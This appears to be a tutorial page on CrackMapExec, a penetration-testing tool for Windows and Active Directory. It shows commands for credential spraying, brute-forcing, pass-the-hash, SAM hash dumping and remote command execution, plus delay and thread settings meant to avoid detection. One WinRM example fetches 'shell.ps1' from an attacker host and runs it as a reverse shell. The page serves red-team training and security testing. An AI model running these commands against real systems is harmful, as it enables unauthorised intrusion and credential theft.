crackmapexec: Post-exploitation and penetration testing tool

CrackMapExec (CME) is a powerful post-exploitation tool designed for assessing the security of Windows and Active Directory environments. It automates common penetration testing tasks, including credential testing, lateral movement, and privilege escalation.

What is CrackMapExec?

CrackMapExec is a Swiss Army knife for red teams and penetration testers working in Active Directory environments. It leverages protocols like SMB, MSSQL, WinRM, RDP, LDAP, and SSH to perform various attacks, including:

• Credential spraying
• Password brute-forcing
• Lateral movement
• Privilege escalation
• Dumping credentials (LSASS, SAM, LSA)
• Session management

How CrackMapExec Works

CME uses valid credentials (or brute-forced ones) to interact with remote systems via different protocols:

• SMB: Enumerate shares, execute commands, dump hashes.
• WinRM: Execute PowerShell commands remotely.
• MSSQL: Execute SQL queries, spawn shells.
• LDAP: Query Active Directory for users, groups, and other objects.
• RDP: Check for access and perform brute-forcing.

It is designed to be stealthy, avoiding detection by logging minimal events.

Installation

On Kali Linux (Official Repo)

sudo apt update && sudo apt install crackmapexec

From Source (Latest Version)

git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
pip install .

Dependencies

• Python 3.9+
• Impacket (pip install impacket)
• Other required packages (installed automatically if using pip)

Basic Usage Examples

General Syntax

crackmapexec <protocol> <target(s)> -u <user> -p <password> [options]

Example 1: Check SMB Access

crackmapexec smb 192.168.1.0/24 -u admin -p P@ssw0rd

• Checks which hosts accept the credentials admin:P@ssw0rd over SMB.

Example 2: Brute-Force Credentials

crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt

• Tests combinations of usernames (users.txt) and passwords (passwords.txt).

Example 3: Execute a Command

crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd -x "whoami"

• Runs whoami on the target machine.

Example 4: Dump SAM Hashes

crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd --sam

• Retrieves local user hashes from the SAM database.

5. Advanced Usage

Pass-the-Hash (PtH) Attack

crackmapexec smb 192.168.1.100 -u admin -H NTLM_HASH --local-auth

• Uses an NTLM hash instead of a plaintext password.

Kerberos Authentication

crackmapexec smb 192.168.1.100 -u admin -p P@ssw0rd -k

• Authenticates using Kerberos (requires valid domain credentials).

MSSQL Command Execution

crackmapexec mssql 192.168.1.100 -u sa -p sqlpassword -q "SELECT name FROM master..sysdatabases"

• Executes a SQL query.

LDAP Enumeration

crackmapexec ldap 192.168.1.100 -u admin -p P@ssw0rd --users

• Lists all users in the domain.

Spawning a Shell

crackmapexec winrm 192.168.1.100 -u admin -p P@ssw0rd -X "powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')\""

• Executes a PowerShell reverse shell.

Command-Line Options

Supported Protocols

1. SMB (Server Message Block)

• Used for file sharing, remote command execution, and credential attacks.
  Example:

crackmapexec smb 192.168.1.0/24 -u admin -p P@ssw0rd --shares

• Enumerate SMB shares across a subnet.

2. WinRM (Windows Remote Management)

• Executes PowerShell commands remotely.
  Example:

crackmapexec winrm 192.168.1.100 -u admin -p P@ssw0rd -X "whoami"

• Runs whoami via WinRM.

3. SSH (Secure Shell)

• Tests SSH credentials and executes commands.
  Example:

crackmapexec ssh 192.168.1.100 -u root -p password -x "id"

• Runs id on a Linux/Unix system.

4. FTP (File Transfer Protocol)

• Checks FTP credentials and uploads/downloads files.
  Example:

crackmapexec ftp 192.168.1.100 -u admin -p P@ssw0rd

• Tests FTP login.

5. RDP (Remote Desktop Protocol)

• Checks if credentials work for RDP.
  Example:

crackmapexec rdp 192.168.1.100 -u admin -p P@ssw0rd

• Verifies RDP access (does not establish a full session).

6. MSSQL (Microsoft SQL Server)

• Executes SQL queries or commands.
  Example:

crackmapexec mssql 192.168.1.100 -u sa -p sqlpassword -q "SELECT name FROM master..sysdatabases"

• Lists all databases.

7. LDAP (Lightweight Directory Access Protocol)

• Queries Active Directory for users, groups, and policies.
  Example:

crackmapexec ldap 192.168.1.100 -u admin -p P@ssw0rd --users

• Lists all domain users.

Practical Use Cases

1. Thread Control (-t)

• Scenario: Fast scanning without overwhelming the network.

crackmapexec smb 192.168.1.0/24 -u user -p pass -t 20

• Limits to 20 threads for stealth.

2. Jitter (--jitter)

• Scenario: Avoid detection by adding random delays.

crackmapexec smb 192.168.1.0/24 -u user -p pass --jitter 3

• Adds 0-3 seconds delay between attempts.

3. Timeout (--timeout)

• Scenario: Skip unresponsive hosts quickly.

crackmapexec smb 192.168.1.0/24 --timeout 2

• Drops hosts not responding within 2 seconds.

4. Verbose Mode (--verbose)

• Scenario: Debug connection issues.

crackmapexec smb 192.168.1.100 -u admin -p wrongpass --verbose

• Shows detailed errors (e.g., “LOGIN_FAILURE”).